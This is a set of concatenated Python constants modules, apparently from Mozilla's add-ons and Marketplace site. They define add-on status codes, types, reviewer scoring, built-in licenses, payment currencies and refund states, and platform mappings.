DEVICE_TYPE_LIST = [DEVICE_DESKTOP, DEVICE_MOBILE, DEVICE_TABLET, DEVICE_GAIA]
DEVICE_TYPES = dict((d.id, d) for d in DEVICE_TYPE_LIST)
REVERSE_DEVICE_LOOKUP = dict((d.id, d.api_name) for d in DEVICE_TYPE_LIST)
DEVICE_LOOKUP = dict((d.api_name, d) for d in DEVICE_TYPE_LIST)
# UAs will attempt to match in this order.
APP_DETECT = (ANDROID, MOBILE, THUNDERBIRD, SEAMONKEY, FIREFOX)
APP_USAGE = _apps = (FIREFOX, THUNDERBIRD, ANDROID, MOBILE, SEAMONKEY)
APPS = dict((app.short, app) for app in _apps)
APPS_ALL = dict((app.id, app) for app in _apps + (MOZILLA, SUNBIRD))
APP_IDS = dict((app.id, app) for app in _apps)
APP_GUIDS = dict((app.guid, app) for app in _apps)
APPS_RETIRED = dict([(MOZILLA.short, MOZILLA), (SUNBIRD.short, SUNBIRD)])
APP_TYPE_SUPPORT = {}
for _app in APP_USAGE:
for _type in _app.types:
APP_TYPE_SUPPORT.setdefault(_type, []).append(_app)
for _app in APPS_ALL.values():
_versions = list(getattr(_app, 'exclude_versions', []))
# 99 comes from the hacks we do to make search tools compatible with
# versions (bug 692360).
_versions.append(99)
_app.exclude_versions = tuple(_versions)
del _app, _apps, _type, _versions
########NEW FILE########
__FILENAME__ = base
import re
from datetime import datetime
from tower import ugettext_lazy as _
# Add-on and File statuses.
STATUS_NULL = 0
STATUS_UNREVIEWED = 1
STATUS_PENDING = 2
STATUS_NOMINATED = 3
STATUS_PUBLIC = 4
STATUS_DISABLED = 5
_STATUS_LISTED = 6 # Deprecated. See bug 616242
STATUS_BETA = 7
STATUS_LITE = 8
STATUS_LITE_AND_NOMINATED = 9
STATUS_PURGATORY = 10 # A temporary home; bug 614686
STATUS_DELETED = 11
STATUS_REJECTED = 12 # This applies only to apps (for now)
STATUS_PUBLIC_WAITING = 13 # bug 740967
STATUS_REVIEW_PENDING = 14 # Themes queue, reviewed, needs further action.
STATUS_BLOCKED = 15
STATUS_CHOICES = {
STATUS_NULL: _(u'Incomplete'),
STATUS_UNREVIEWED: _(u'Awaiting Preliminary Review'),
STATUS_PENDING: _(u'Pending approval'),
STATUS_NOMINATED: _(u'Awaiting Full Review'),
STATUS_PUBLIC: _(u'Fully Reviewed'),
STATUS_DISABLED: _(u'Disabled by Mozilla'),
STATUS_BETA: _(u'Beta'),
STATUS_LITE: _(u'Preliminarily Reviewed'),
STATUS_LITE_AND_NOMINATED: _(
u'Preliminarily Reviewed and Awaiting Full Review'),
STATUS_PURGATORY: _(u'Pending a review choice'),
STATUS_DELETED: _(u'Deleted'),
STATUS_REJECTED: _(u'Rejected'),
# Approved, but the developer would like to put it public when they want.
# The need to go to the marketplace and actualy make it public.
STATUS_PUBLIC_WAITING: _(u'Approved but waiting'),
STATUS_REVIEW_PENDING: _(u'Flagged for further review'),
STATUS_BLOCKED: _(u'Blocked'),
}
# Marketplace app status terms.
MKT_STATUS_CHOICES = STATUS_CHOICES.copy()
MKT_STATUS_CHOICES[STATUS_PUBLIC] = _(u'Published')
MKT_STATUS_CHOICES[STATUS_PUBLIC_WAITING] = _(u'Approved but unpublished')
# Marketplace file status terms.
MKT_STATUS_FILE_CHOICES = MKT_STATUS_CHOICES.copy()
MKT_STATUS_FILE_CHOICES[STATUS_DISABLED] = _(u'Obsolete')
# We need to expose nice values that aren't localisable.
STATUS_CHOICES_API = {
STATUS_NULL: 'incomplete',
STATUS_UNREVIEWED: 'unreviewed',
STATUS_PENDING: 'pending',
STATUS_NOMINATED: 'nominated',
STATUS_PUBLIC: 'public',
STATUS_DISABLED: 'disabled',
STATUS_BETA: 'beta',
STATUS_LITE: 'lite',
STATUS_LITE_AND_NOMINATED: 'lite-nominated',
STATUS_PURGATORY: 'purgatory',
STATUS_DELETED: 'deleted',
STATUS_REJECTED: 'rejected',
STATUS_PUBLIC_WAITING: 'waiting',
STATUS_REVIEW_PENDING: 'review-pending',
STATUS_BLOCKED: 'blocked',
}
STATUS_CHOICES_API_LOOKUP = {
'incomplete': STATUS_NULL,
'unreviewed': STATUS_UNREVIEWED,
'pending': STATUS_PENDING,
'nominated': STATUS_NOMINATED,
'public': STATUS_PUBLIC,
'disabled': STATUS_DISABLED,
'beta': STATUS_BETA,
'lite': STATUS_LITE,
'lite-nominated': STATUS_LITE_AND_NOMINATED,
'purgatory': STATUS_PURGATORY,
'deleted': STATUS_DELETED,
'rejected': STATUS_REJECTED,
'waiting': STATUS_PUBLIC_WAITING,
'review-pending': STATUS_REVIEW_PENDING,
'blocked': STATUS_BLOCKED,
}
PUBLIC_IMMEDIATELY = None
# Our MySQL does not store microseconds.
PUBLIC_WAIT = datetime.max.replace(microsecond=0)
REVIEWED_STATUSES = (STATUS_LITE, STATUS_LITE_AND_NOMINATED, STATUS_PUBLIC)
UNREVIEWED_STATUSES = (STATUS_UNREVIEWED, STATUS_PENDING, STATUS_NOMINATED,
STATUS_PURGATORY)
VALID_STATUSES = (STATUS_UNREVIEWED, STATUS_PENDING, STATUS_NOMINATED,
STATUS_PUBLIC, STATUS_BETA, STATUS_LITE,
STATUS_LITE_AND_NOMINATED, STATUS_PURGATORY,
STATUS_PUBLIC_WAITING)
# We don't show addons/versions with UNREVIEWED_STATUS in public.
LISTED_STATUSES = tuple(st for st in VALID_STATUSES
if st not in (STATUS_PENDING, STATUS_PUBLIC_WAITING))
# An add-on in one of these statuses is awaiting a review.
STATUS_UNDER_REVIEW = (STATUS_UNREVIEWED, STATUS_NOMINATED,
STATUS_LITE_AND_NOMINATED)
LITE_STATUSES = (STATUS_LITE, STATUS_LITE_AND_NOMINATED)
MIRROR_STATUSES = (STATUS_PUBLIC,)
# An add-on in one of these statuses can become premium.
PREMIUM_STATUSES = (STATUS_NULL,) + STATUS_UNDER_REVIEW
# Newly submitted apps begin life at this status.
WEBAPPS_UNREVIEWED_STATUS = STATUS_PENDING
# These apps have been approved and are listed; or could be without further
# review
WEBAPPS_APPROVED_STATUSES = (STATUS_PUBLIC, STATUS_PUBLIC_WAITING)
# An app with this status makes its detail page "invisible".
WEBAPPS_UNLISTED_STATUSES = (STATUS_DISABLED, STATUS_PENDING,
STATUS_PUBLIC_WAITING, STATUS_REJECTED)
# The only statuses we use in the marketplace.
MARKET_STATUSES = (STATUS_NULL, STATUS_PENDING, STATUS_PUBLIC, STATUS_DISABLED,
STATUS_DELETED, STATUS_REJECTED, STATUS_PUBLIC_WAITING,
STATUS_BLOCKED)
# These apps shouldn't be considered anymore in mass-emailing etc.
WEBAPPS_EXCLUDED_STATUSES = (STATUS_DISABLED, STATUS_DELETED, STATUS_REJECTED)
# Types of administrative review queues for an add-on:
ADMIN_REVIEW_FULL = 1
ADMIN_REVIEW_PRELIM = 2
ADMIN_REVIEW_TYPES = {
ADMIN_REVIEW_FULL: _(u'Full'),
ADMIN_REVIEW_PRELIM: _(u'Preliminary'),
}
# Add-on author roles.
AUTHOR_ROLE_VIEWER = 1
AUTHOR_ROLE_DEV = 4
AUTHOR_ROLE_OWNER = 5
AUTHOR_ROLE_SUPPORT = 6
AUTHOR_CHOICES = (
(AUTHOR_ROLE_OWNER, _(u'Owner')),
(AUTHOR_ROLE_DEV, _(u'Developer')),
(AUTHOR_ROLE_VIEWER, _(u'Viewer')),
(AUTHOR_ROLE_SUPPORT, _(u'Support')),
)
# Addon types
ADDON_ANY = 0
ADDON_EXTENSION = 1
ADDON_THEME = 2
ADDON_DICT = 3
ADDON_SEARCH = 4
ADDON_LPAPP = 5
ADDON_LPADDON = 6
ADDON_PLUGIN = 7
ADDON_API = 8 # not actually a type but used to identify extensions + themes
ADDON_PERSONA = 9
ADDON_WEBAPP = 11 # Calling this ADDON_* is gross but we've gotta ship code.
# Addon type groupings.
GROUP_TYPE_ADDON = [ADDON_EXTENSION, ADDON_DICT, ADDON_SEARCH, ADDON_LPAPP,
ADDON_LPADDON, ADDON_PLUGIN, ADDON_API]
GROUP_TYPE_THEME = [ADDON_THEME, ADDON_PERSONA]
GROUP_TYPE_WEBAPP = [ADDON_WEBAPP]
# Singular
ADDON_TYPE = {
ADDON_ANY: _(u'Any'),
ADDON_EXTENSION: _(u'Extension'),
ADDON_THEME: _(u'Complete Theme'),
ADDON_DICT: _(u'Dictionary'),
ADDON_SEARCH: _(u'Search Engine'),
ADDON_PLUGIN: _(u'Plugin'),
ADDON_LPAPP: _(u'Language Pack (Application)'),
ADDON_PERSONA: _(u'Theme'),
ADDON_WEBAPP: _(u'App'),
}
# Plural
ADDON_TYPES = {
ADDON_ANY: _(u'Any'),
ADDON_EXTENSION: _(u'Extensions'),
ADDON_THEME: _(u'Complete Themes'),
ADDON_DICT: _(u'Dictionaries'),
ADDON_SEARCH: _(u'Search Tools'),
ADDON_PLUGIN: _(u'Plugins'),
ADDON_LPAPP: _(u'Language Packs (Application)'),
ADDON_PERSONA: _(u'Themes'),
ADDON_WEBAPP: _(u'Apps'),
}
# Searchable Add-on Types
ADDON_SEARCH_TYPES = [
ADDON_ANY,
ADDON_EXTENSION,
ADDON_THEME,
ADDON_DICT,
ADDON_SEARCH,
ADDON_LPAPP,
ADDON_PERSONA,
]
ADDON_ADMIN_SEARCH_TYPES = ADDON_SEARCH_TYPES + [ADDON_PLUGIN]
MARKETPLACE_TYPES = [ADDON_WEBAPP]
# ADDON_WEBAPP Types
ADDON_WEBAPP_HOSTED = 1
ADDON_WEBAPP_PACKAGED = 2
ADDON_WEBAPP_PRIVILEGED = 3
ADDON_WEBAPP_TYPES = {
ADDON_WEBAPP_HOSTED: 'hosted',
ADDON_WEBAPP_PACKAGED: 'packaged',
ADDON_WEBAPP_PRIVILEGED: 'privileged',
}
ADDON_WEBAPP_TYPES_LOOKUP = dict((v, k) for k, v in ADDON_WEBAPP_TYPES.items())
# Icons
ADDON_ICONS = {
ADDON_ANY: 'default-addon.png',
ADDON_THEME: 'default-theme.png',
}
# We use these slugs in browse page urls.
ADDON_SLUGS = {
ADDON_EXTENSION: 'extensions',
ADDON_THEME: 'themes',
ADDON_DICT: 'language-tools',
ADDON_LPAPP: 'language-tools',
ADDON_PERSONA: 'personas',
ADDON_SEARCH: 'search-tools',
ADDON_WEBAPP: 'apps',
}
# These are used in the update API.
ADDON_SLUGS_UPDATE = {
ADDON_EXTENSION: 'extension',
ADDON_THEME: 'theme',
ADDON_DICT: 'extension',
ADDON_SEARCH: 'search',
ADDON_LPAPP: 'item',
ADDON_LPADDON: 'extension',
ADDON_PERSONA: 'background-theme',
ADDON_PLUGIN: 'plugin',
ADDON_WEBAPP: 'app',
}
# A slug to ID map for the search API. Included are all ADDON_TYPES that are
# found in ADDON_SEARCH_TYPES.
ADDON_SEARCH_SLUGS = {
'any': ADDON_ANY,
'extension': ADDON_EXTENSION,
'theme': ADDON_THEME,
'dictionary': ADDON_DICT,
'search': ADDON_SEARCH,
'language': ADDON_LPAPP,
'persona': ADDON_PERSONA,
}
# Marketplace search API addon types.
MKT_ADDON_TYPES_API = {
'app': ADDON_WEBAPP,
}
ADDON_FREE = 0
ADDON_PREMIUM = 1
ADDON_PREMIUM_INAPP = 2
ADDON_FREE_INAPP = 3
# The addon will have payments, but they aren't using our payment system.
ADDON_OTHER_INAPP = 4
ADDON_PREMIUM_TYPES = {
ADDON_FREE: _('Free'),
ADDON_PREMIUM: _('Premium'),
ADDON_PREMIUM_INAPP: _('Premium with in-app payments'),
ADDON_FREE_INAPP: _('Free with in-app payments'),
ADDON_OTHER_INAPP: _("I'll use my own system for in-app payments")
}
# Non-locale versions for the API.
ADDON_PREMIUM_API = {
ADDON_FREE: 'free',
ADDON_PREMIUM: 'premium',
ADDON_PREMIUM_INAPP: 'premium-inapp',
ADDON_FREE_INAPP: 'free-inapp',
ADDON_OTHER_INAPP: 'other',
}
ADDON_PREMIUM_API_LOOKUP = dict((v, k) for k, v in ADDON_PREMIUM_API.items())
# Apps that require some sort of payment prior to installing.
ADDON_PREMIUMS = (ADDON_PREMIUM, ADDON_PREMIUM_INAPP)
# Apps that do *not* require a payment prior to installing.
ADDON_FREES = (ADDON_FREE, ADDON_FREE_INAPP, ADDON_OTHER_INAPP)
ADDON_INAPPS = (ADDON_PREMIUM_INAPP, ADDON_FREE_INAPP)
ADDON_BECOME_PREMIUM = (ADDON_EXTENSION, ADDON_THEME, ADDON_DICT,
ADDON_LPAPP, ADDON_WEBAPP)
ADDON_HAS_PAYMENTS = (ADDON_FREE_INAPP, ADDON_PREMIUM, ADDON_PREMIUM_INAPP)
# Edit addon information
MAX_TAGS = 20
MIN_TAG_LENGTH = 2
MAX_CATEGORIES = 2
# Icon upload sizes
ADDON_ICON_SIZES = [32, 48, 64, 128, 256, 512]
# Preview upload sizes [thumb, full]
ADDON_PREVIEW_SIZES = [(200, 150), (700, 525)]
# Accepted image MIME-types
IMG_TYPES = ('image/png', 'image/jpeg', 'image/jpg')
VIDEO_TYPES = ('video/webm',)
# These types don't maintain app compatibility in the db. Instead, we look at
# APP.types and APP_TYPE_SUPPORT to figure out where they are compatible.
NO_COMPAT = (ADDON_SEARCH, ADDON_PERSONA)
HAS_COMPAT = dict((t, t not in NO_COMPAT) for t in ADDON_TYPES)
# Contributions
CONTRIB_NONE = 0
CONTRIB_PASSIVE = 1
CONTRIB_AFTER = 2
CONTRIB_ROADBLOCK = 3
CONTRIB_CHOICES = (
(CONTRIB_PASSIVE,
_(u"Only ask on this add-on's page and developer profile")),
(CONTRIB_AFTER, _(u"Ask after users start downloading this add-on")),
(CONTRIB_ROADBLOCK, _(u"Ask before users can download this add-on")),
)
# Collections.
COLLECTION_NORMAL = 0
COLLECTION_SYNCHRONIZED = 1
COLLECTION_FEATURED = 2
COLLECTION_RECOMMENDED = 3
COLLECTION_FAVORITES = 4
COLLECTION_MOBILE = 5
COLLECTION_ANONYMOUS = 6
COLLECTIONS_NO_CONTRIB = (COLLECTION_SYNCHRONIZED, COLLECTION_FAVORITES)
COLLECTION_SPECIAL_SLUGS = {
COLLECTION_MOBILE: 'mobile',
COLLECTION_FAVORITES: 'favorites',
}
COLLECTION_CHOICES = {
COLLECTION_NORMAL: 'Normal',
COLLECTION_SYNCHRONIZED: 'Synchronized',
COLLECTION_FEATURED: 'Featured',
COLLECTION_RECOMMENDED: 'Generated Recommendations',
COLLECTION_FAVORITES: 'Favorites',
COLLECTION_MOBILE: 'Mobile',
COLLECTION_ANONYMOUS: 'Anonymous',
}
COLLECTION_SEARCH_CHOICES = [
COLLECTION_NORMAL,
COLLECTION_FEATURED,
COLLECTION_RECOMMENDED,
COLLECTION_MOBILE,
COLLECTION_ANONYMOUS,
]
COLLECTION_ROLE_PUBLISHER = 0
COLLECTION_ROLE_ADMIN = 1
COLLECTION_AUTHOR_CHOICES = {
COLLECTION_ROLE_PUBLISHER: 'Publisher',
COLLECTION_ROLE_ADMIN: 'Admin',
}
# Contributions.
FOUNDATION_ORG = 1 # The charities.id of the Mozilla Foundation.
VERSION_BETA = re.compile('(a|alpha|b|beta|pre|rc)\d*$')
VERSION_SEARCH = re.compile('\.(\d+)$')
# Editor Tools
EDITOR_VIEWING_INTERVAL = 8 # How often we ping for "who's watching?"
# Types of Canned Responses for reviewer tools.
CANNED_RESPONSE_ADDON = 1
CANNED_RESPONSE_APP = 2
CANNED_RESPONSE_CHOICES = {
CANNED_RESPONSE_ADDON: _('Add-on'),
CANNED_RESPONSE_APP: _('App'),
}
# For use in urls.
ADDON_ID = r"""(?P<addon_id>[^/<>"']+)"""
ADDON_UUID = r'(?P<uuid>[\w]{8}-[\w]{4}-[\w]{4}-[\w]{4}-[\w]{12})'
APP_SLUG = r"""(?P<app_slug>[^/<>"']+)"""
# Reviewer Incentive Scores.
# Note: Don't change these since they're used as keys in the database.
REVIEWED_MANUAL = 0
REVIEWED_ADDON_FULL = 10
REVIEWED_ADDON_PRELIM = 11
REVIEWED_ADDON_UPDATE = 12
REVIEWED_DICT_FULL = 20
REVIEWED_DICT_PRELIM = 21
REVIEWED_DICT_UPDATE = 22
REVIEWED_LP_FULL = 30
REVIEWED_LP_PRELIM = 31
REVIEWED_LP_UPDATE = 32
REVIEWED_PERSONA = 40
# TODO: Leaving room for persona points based on queue.
REVIEWED_SEARCH_FULL = 50
REVIEWED_SEARCH_PRELIM = 51
REVIEWED_SEARCH_UPDATE = 52
REVIEWED_THEME_FULL = 60
REVIEWED_THEME_PRELIM = 61
REVIEWED_THEME_UPDATE = 62
REVIEWED_WEBAPP_HOSTED = 70
REVIEWED_WEBAPP_PACKAGED = 71
REVIEWED_WEBAPP_REREVIEW = 72
REVIEWED_WEBAPP_UPDATE = 73
REVIEWED_ADDON_REVIEW = 80
REVIEWED_APP_REVIEW = 81
REVIEWED_CHOICES = {
REVIEWED_MANUAL: _('Manual Reviewer Points'),
REVIEWED_ADDON_FULL: _('Full Add-on Review'),
REVIEWED_ADDON_PRELIM: _('Preliminary Add-on Review'),
REVIEWED_ADDON_UPDATE: _('Updated Add-on Review'),
REVIEWED_DICT_FULL: _('Full Dictionary Review'),
REVIEWED_DICT_PRELIM: _('Preliminary Dictionary Review'),
REVIEWED_DICT_UPDATE: _('Updated Dictionary Review'),
REVIEWED_LP_FULL: _('Full Language Pack Review'),
REVIEWED_LP_PRELIM: _('Preliminary Language Pack Review'),
REVIEWED_LP_UPDATE: _('Updated Language Pack Review'),
REVIEWED_PERSONA: _('Theme Review'),
REVIEWED_SEARCH_FULL: _('Full Search Provider Review'),
REVIEWED_SEARCH_PRELIM: _('Preliminary Search Provider Review'),
REVIEWED_SEARCH_UPDATE: _('Updated Search Provider Review'),
REVIEWED_THEME_FULL: _('Complete Theme Review'),
REVIEWED_THEME_PRELIM: _('Preliminary Complete Theme Review'),
REVIEWED_THEME_UPDATE: _('Updated Complete Theme Review'),
REVIEWED_WEBAPP_HOSTED: _('Web App Review'),
REVIEWED_WEBAPP_PACKAGED: _('Packaged App Review'),
REVIEWED_WEBAPP_REREVIEW: _('Web App Re-review'),
REVIEWED_WEBAPP_UPDATE: _('Updated Packaged App Review'),
REVIEWED_ADDON_REVIEW: _('Moderated Addon Review'),
REVIEWED_APP_REVIEW: _('Moderated App Review'),
}
REVIEWED_SCORES = {
REVIEWED_MANUAL: 0,
REVIEWED_ADDON_FULL: 120,
REVIEWED_ADDON_PRELIM: 60,
REVIEWED_ADDON_UPDATE: 80,
REVIEWED_DICT_FULL: 60,
REVIEWED_DICT_PRELIM: 20,
REVIEWED_DICT_UPDATE: 60,
REVIEWED_LP_FULL: 60,
REVIEWED_LP_PRELIM: 20,
REVIEWED_LP_UPDATE: 60,
REVIEWED_PERSONA: 5,
REVIEWED_SEARCH_FULL: 30,
REVIEWED_SEARCH_PRELIM: 10,
REVIEWED_SEARCH_UPDATE: 30,
REVIEWED_THEME_FULL: 80,
REVIEWED_THEME_PRELIM: 40,
REVIEWED_THEME_UPDATE: 80,
REVIEWED_WEBAPP_HOSTED: 60,
REVIEWED_WEBAPP_PACKAGED: 120,
REVIEWED_WEBAPP_REREVIEW: 30,
REVIEWED_WEBAPP_UPDATE: 80,
REVIEWED_ADDON_REVIEW: 1,
REVIEWED_APP_REVIEW: 1,
}
REVIEWED_AMO = (
REVIEWED_ADDON_FULL,
REVIEWED_ADDON_PRELIM,
REVIEWED_ADDON_UPDATE,
REVIEWED_DICT_FULL,
REVIEWED_DICT_PRELIM,
REVIEWED_DICT_UPDATE,
REVIEWED_LP_FULL,
REVIEWED_LP_PRELIM,
REVIEWED_LP_UPDATE,
REVIEWED_SEARCH_FULL,
REVIEWED_SEARCH_PRELIM,
REVIEWED_SEARCH_UPDATE,
REVIEWED_THEME_FULL,
REVIEWED_THEME_PRELIM,
REVIEWED_THEME_UPDATE,
REVIEWED_ADDON_REVIEW,
)
REVIEWED_MARKETPLACE = (
REVIEWED_WEBAPP_HOSTED,
REVIEWED_WEBAPP_PACKAGED,
REVIEWED_WEBAPP_REREVIEW,
REVIEWED_WEBAPP_UPDATE,
REVIEWED_APP_REVIEW,
)
REVIEWED_LEVELS = [
{'name': _('Level 1'), 'points': 2160},
{'name': _('Level 2'), 'points': 4320},
{'name': _('Level 3'), 'points': 8700},
{'name': _('Level 4'), 'points': 21000},
{'name': _('Level 5'), 'points': 45000},
{'name': _('Level 6'), 'points': 96000},
]
# Login credential source. We'll also include the site source in that.
# All the old existing AMO users and anyone before we started tracking this.
LOGIN_SOURCE_UNKNOWN = 0
# Most likely everyone who signed up for the marketplace.
LOGIN_SOURCE_BROWSERID = 1
# Everyone who signed up for the marketplace using BrowserID.
LOGIN_SOURCE_MMO_BROWSERID = 2
# Everyone who signed up for AMO once it uses BrowserID.
LOGIN_SOURCE_AMO_BROWSERID = 3
# These are logins that use BrowserID.
LOGIN_SOURCE_BROWSERIDS = [LOGIN_SOURCE_BROWSERID, LOGIN_SOURCE_AMO_BROWSERID,
LOGIN_SOURCE_MMO_BROWSERID]
########NEW FILE########
__FILENAME__ = licenses
from tower import ugettext_lazy as _lazy
# Built-in Licenses
class _LicenseBase(object):
"""Base class for built-in licenses."""
icons = '' # CSS classes. See zamboni.css for a list.
some_rights = True
class LICENSE_COPYRIGHT(_LicenseBase):
id = 1
name = _lazy(u'All Rights Reserved')
icons = 'copyr'
some_rights = False
url = None
class LICENSE_CC_BY(_LicenseBase):
id = 2
name = _lazy(u'Creative Commons Attribution 3.0')
url = 'http://creativecommons.org/licenses/by/3.0/'
icons = 'cc-attrib'
class LICENSE_CC_BY_NC(_LicenseBase):
id = 3
icons = 'cc-attrib cc-noncom'
name = _lazy(u'Creative Commons Attribution-NonCommercial 3.0')
url = 'http://creativecommons.org/licenses/by-nc/3.0/'
class LICENSE_CC_BY_NC_ND(_LicenseBase):
id = 4
icons = 'cc-attrib cc-noncom cc-noderiv'
name = _lazy(u'Creative Commons Attribution-NonCommercial-NoDerivs 3.0')
url = 'http://creativecommons.org/licenses/by-nc-nd/3.0/'
class LICENSE_CC_BY_NC_SA(_LicenseBase):
id = 5
icons = 'cc-attrib cc-noncom cc-share'
name = _lazy(u'Creative Commons Attribution-NonCommercial-Share Alike 3.0')
url = 'http://creativecommons.org/licenses/by-nc-sa/3.0/'
class LICENSE_CC_BY_ND(_LicenseBase):
id = 6
icons = 'cc-attrib cc-noderiv'
name = _lazy(u'Creative Commons Attribution-NoDerivs 3.0')
url = 'http://creativecommons.org/licenses/by-nd/3.0/'
class LICENSE_CC_BY_SA(_LicenseBase):
id = 7
icons = 'cc-attrib cc-share'
name = _lazy(u'Creative Commons Attribution-ShareAlike 3.0')
url = 'http://creativecommons.org/licenses/by-sa/3.0/'
PERSONA_LICENSES = (LICENSE_COPYRIGHT, LICENSE_CC_BY, LICENSE_CC_BY_NC,
LICENSE_CC_BY_NC_ND, LICENSE_CC_BY_NC_SA, LICENSE_CC_BY_ND,
LICENSE_CC_BY_SA)
PERSONA_LICENSES_CHOICES = [(l.id, l) for l in PERSONA_LICENSES]
PERSONA_LICENSES_IDS = dict(PERSONA_LICENSES_CHOICES)
########NEW FILE########
__FILENAME__ = payments
# -*- coding: utf-8 -*-
from tower import ugettext_lazy as _
from lib.constants import ALL_CURRENCIES
# Source, PayPal docs, PP_AdaptivePayments.PDF
PAYPAL_CURRENCIES = ['AUD', 'BRL', 'CAD', 'CHF', 'CZK', 'DKK', 'EUR', 'GBP',
'HKD', 'HUF', 'ILS', 'JPY', 'MXN', 'MYR', 'NOK', 'NZD',
'PHP', 'PLN', 'SEK', 'SGD', 'THB', 'TWD', 'USD']
PAYPAL_CURRENCIES = dict((k, ALL_CURRENCIES[k]) for k in PAYPAL_CURRENCIES)
# TODO(Kumar) bug 768223. Need to find a more complete list for this.
# This is just a sample.
LOCALE_CURRENCY = {
'en_US': 'USD',
'en_CA': 'CAD',
'it': 'EUR',
'fr': 'EUR',
'pt_BR': 'BRL',
}
CURRENCY_DEFAULT = 'USD'
CONTRIB_VOLUNTARY = 0
CONTRIB_PURCHASE = 1
CONTRIB_REFUND = 2
CONTRIB_CHARGEBACK = 3
# We've started a transaction and we need to wait to see what
# paypal will return.
CONTRIB_PENDING = 4
# The following in-app contribution types are deprecated. Avoid re-using
# these ID numbers in new types.
_CONTRIB_INAPP_PENDING = 5
_CONTRIB_INAPP = 6
# The app was temporarily free. This is so we can record it in
# the purchase table, even though there isn't a contribution.
CONTRIB_NO_CHARGE = 7
CONTRIB_OTHER = 99
CONTRIB_TYPES = {
CONTRIB_CHARGEBACK: _('Chargeback'),
CONTRIB_OTHER: _('Other'),
CONTRIB_PURCHASE: _('Purchase'),
CONTRIB_REFUND: _('Refund'),
CONTRIB_VOLUNTARY: _('Voluntary'),
}
MKT_TRANSACTION_CONTRIB_TYPES = {
CONTRIB_CHARGEBACK: _('Chargeback'),
CONTRIB_PURCHASE: _('Purchase'),
CONTRIB_REFUND: _('Refund'),
}
CONTRIB_TYPE_DEFAULT = CONTRIB_VOLUNTARY
REFUND_PENDING = 0 # Just to irritate you I didn't call this REFUND_REQUESTED.
REFUND_APPROVED = 1
REFUND_APPROVED_INSTANT = 2
REFUND_DECLINED = 3
REFUND_FAILED = 4
REFUND_STATUSES = {
# Refund pending (purchase > 30 min ago).
REFUND_PENDING: _('Pending'),
# Approved manually by developer.
REFUND_APPROVED: _('Approved'),
# Instant refund (purchase <= 30 min ago).
REFUND_APPROVED_INSTANT: _('Approved Instantly'),
# Declined manually by developer.
REFUND_DECLINED: _('Declined'),
#Refund didn't work somehow.
REFUND_FAILED: _('Failed'),
}
PAYMENT_DETAILS_ERROR = {
'CREATED': _('The payment was received, but not completed.'),
'INCOMPLETE': _('The payment was received, but not completed.'),
'ERROR': _('The payment failed.'),
'REVERSALERROR': _('The reversal failed.'),
'PENDING': _('The payment was received, but not completed '
'and is awaiting processing.'),
}
PROVIDER_PAYPAL = 0
PROVIDER_BANGO = 1
PROVIDER_REFERENCE = 2
PROVIDER_BOKU = 3
PROVIDER_CHOICES = (
(PROVIDER_PAYPAL, 'paypal'),
(PROVIDER_BANGO, 'bango'),
(PROVIDER_REFERENCE, 'reference'),
(PROVIDER_BOKU, 'boku')
)
PROVIDER_LOOKUP = dict([(v, k) for k, v in PROVIDER_CHOICES])
CARRIER_CHOICES = ()
# Payment methods accepted by the PriceCurrency..
#
# If we ever go beyond these two payment methods, we might need to do
# something more scalable.
PAYMENT_METHOD_OPERATOR = 0
PAYMENT_METHOD_CARD = 1
PAYMENT_METHOD_ALL = 2
PAYMENT_METHOD_CHOICES = (
(PAYMENT_METHOD_OPERATOR, 'operator'),
(PAYMENT_METHOD_CARD, 'card'),
(PAYMENT_METHOD_ALL, 'operator+card')
)
########NEW FILE########
__FILENAME__ = platforms
from django.utils.datastructures import SortedDict
from tower import ugettext_lazy as _
from . import applications
# Platforms
class PLATFORM_ANY:
id = 0
name = _(u'Any')
shortname = 'any'
# API name is not translated
api_name = u'ALL'
class PLATFORM_ALL:
id = 1
name = _(u'All Platforms')
shortname = 'all'
api_name = u'ALL'
class PLATFORM_ALL_MOBILE:
id = 9
name = _(u'All Mobile Platforms')
shortname = 'allmobile'
api_name = u'ALL_mobile'
class PLATFORM_LINUX:
id = 2
name = _(u'Linux')
shortname = 'linux'
api_name = u'Linux'
class PLATFORM_MAC:
id = 3
name = _(u'Mac OS X')
shortname = 'mac'
api_name = u'Darwin'
class PLATFORM_BSD:
id = 4
name = _(u'BSD')
shortname = 'bsd'
api_name = u'BSD_OS'
class PLATFORM_WIN:
id = 5
name = _(u'Windows')
shortname = 'windows'
api_name = u'WINNT'
class PLATFORM_SUN:
id = 6
name = _(u'Solaris')
shortname = 'solaris'
api_name = 'SunOS'
class PLATFORM_ANDROID:
id = 7
name = _(u'Android')
shortname = u'android'
api_name = u'Android'
class PLATFORM_MAEMO:
id = 8
name = _(u'Maemo')
shortname = u'maemo'
api_name = u'Maemo'
# Contains historic platforms that are no longer supported.
# These exist so that legacy files can still be edited.
PLATFORMS = {PLATFORM_ANY.id: PLATFORM_ANY, PLATFORM_ALL.id: PLATFORM_ALL,
PLATFORM_LINUX.id: PLATFORM_LINUX, PLATFORM_MAC.id: PLATFORM_MAC,
PLATFORM_BSD.id: PLATFORM_BSD, PLATFORM_WIN.id: PLATFORM_WIN,
PLATFORM_SUN.id: PLATFORM_SUN,
PLATFORM_ALL_MOBILE.id: PLATFORM_ALL_MOBILE,
PLATFORM_ANDROID.id: PLATFORM_ANDROID,
PLATFORM_MAEMO.id: PLATFORM_MAEMO}
MOBILE_PLATFORMS = SortedDict([(PLATFORM_ALL_MOBILE.id, PLATFORM_ALL_MOBILE),
(PLATFORM_ANDROID.id, PLATFORM_ANDROID),
(PLATFORM_MAEMO.id, PLATFORM_MAEMO)])
DESKTOP_PLATFORMS = SortedDict([(PLATFORM_ALL.id, PLATFORM_ALL),
(PLATFORM_LINUX.id, PLATFORM_LINUX),
(PLATFORM_MAC.id, PLATFORM_MAC),
(PLATFORM_WIN.id, PLATFORM_WIN)])
SUPPORTED_PLATFORMS = DESKTOP_PLATFORMS.copy()
SUPPORTED_PLATFORMS.update(MOBILE_PLATFORMS)
PLATFORM_DICT = {
'all': PLATFORM_ALL,
'linux': PLATFORM_LINUX,
'mac': PLATFORM_MAC,
'macosx': PLATFORM_MAC,
'darwin': PLATFORM_MAC,
'bsd': PLATFORM_BSD,
'bsd_os': PLATFORM_BSD,
'freebsd': PLATFORM_BSD,
'win': PLATFORM_WIN,
'winnt': PLATFORM_WIN,
'windows': PLATFORM_WIN,
'sun': PLATFORM_SUN,
'sunos': PLATFORM_SUN,
'solaris': PLATFORM_SUN,
'mobile': PLATFORM_ALL_MOBILE,
'android': PLATFORM_ANDROID,
'maemo': PLATFORM_MAEMO,
}
